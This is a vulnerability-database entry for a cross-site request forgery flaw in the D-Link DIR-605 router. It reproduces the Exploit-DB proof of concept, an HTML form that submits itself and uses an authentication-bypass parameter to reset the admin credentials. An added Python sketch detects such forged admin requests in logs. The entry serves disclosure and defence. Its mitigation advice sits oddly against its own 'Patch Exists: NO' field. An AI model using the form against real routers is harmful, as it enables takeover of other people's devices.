vendor: DIR-605
by: iqzer0++
CVSS: 7.5 (HIGH)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: DIR-605
Affected Version From: Firmware Version: 2.00
Affected Version To: Firmware Version: 2.00
Patch Exists: NO
Related CWE:
CPE: h:d-link:dir-605
Metasploit:
Other Scripts:
Platforms Tested: DIR-605
2012

D-Link DIR-605 CSRF Vulnerability

This exploit allows unauthorized access to the D-Link DIR-605 device and lets an attacker perform POST injections.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware to the latest version.

Exploit-DB raw data:

# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605

This allows unauthorized access to the device and post injections

<html>
<form name="bypass" action="http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
        <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="iqzer0" />
        <input type="hidden" name="admin_password1" value="bypass" />
        <input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>
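
Detection sketch for the request the form above produces, added here as an example and not part of the Exploit-DB entry: it flags POSTs to tools_admin.php that carry the NO_NEED_AUTH or AUTH_GROUP query parameters or that arrive from a different origin than the device itself. It assumes request records (method, URL, Origin or Referer value) are available from a proxy or similar log; the addresses, host names and function names are constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

ADMIN_PATH = "/tools_admin.php"                    # endpoint named in the PoC
OVERRIDE_PARAMS = {"NO_NEED_AUTH", "AUTH_GROUP"}   # query parameters named in the PoC

def findings(method, url, origin):
    """Return the reasons a request resembles the PoC's forged admin POST."""
    target = urlsplit(url)
    if method.upper() != "POST" or target.path != ADMIN_PATH:
        return []
    reasons = []
    query = parse_qs(target.query, keep_blank_values=True)
    hits = sorted(OVERRIDE_PARAMS.intersection(query))
    if hits:
        reasons.append("auth-override parameter: " + ",".join(hits))
    if origin is None:
        reasons.append("no Origin/Referer on admin POST")
    else:
        source = urlsplit(origin).netloc.lower()
        if source != target.netloc.lower():
            reasons.append("cross-origin admin POST from " + source)
    return reasons

def scan(records):
    """Return (record index, reasons) for every record with at least one finding."""
    flagged = []
    for i, (method, url, origin) in enumerate(records):
        reasons = findings(method, url, origin)
        if reasons:
            flagged.append((i, reasons))
    return flagged

# Constructed sample records: (method, URL, Origin or Referer header value).
# 192.0.2.1 and evil.example are placeholders, not values from the advisory.
SAMPLE = [
    ("POST", "http://192.0.2.1/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0",
     "http://evil.example/page.html"),
    ("POST", "http://192.0.2.1/tools_admin.php", "http://192.0.2.1/tools_admin.php"),
    ("GET", "http://192.0.2.1/index.php", None),
    ("POST", "http://192.0.2.1/tools_admin.php", None),
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE):
        print(index, SAMPLE[index][1], "->", "; ".join(reasons))
```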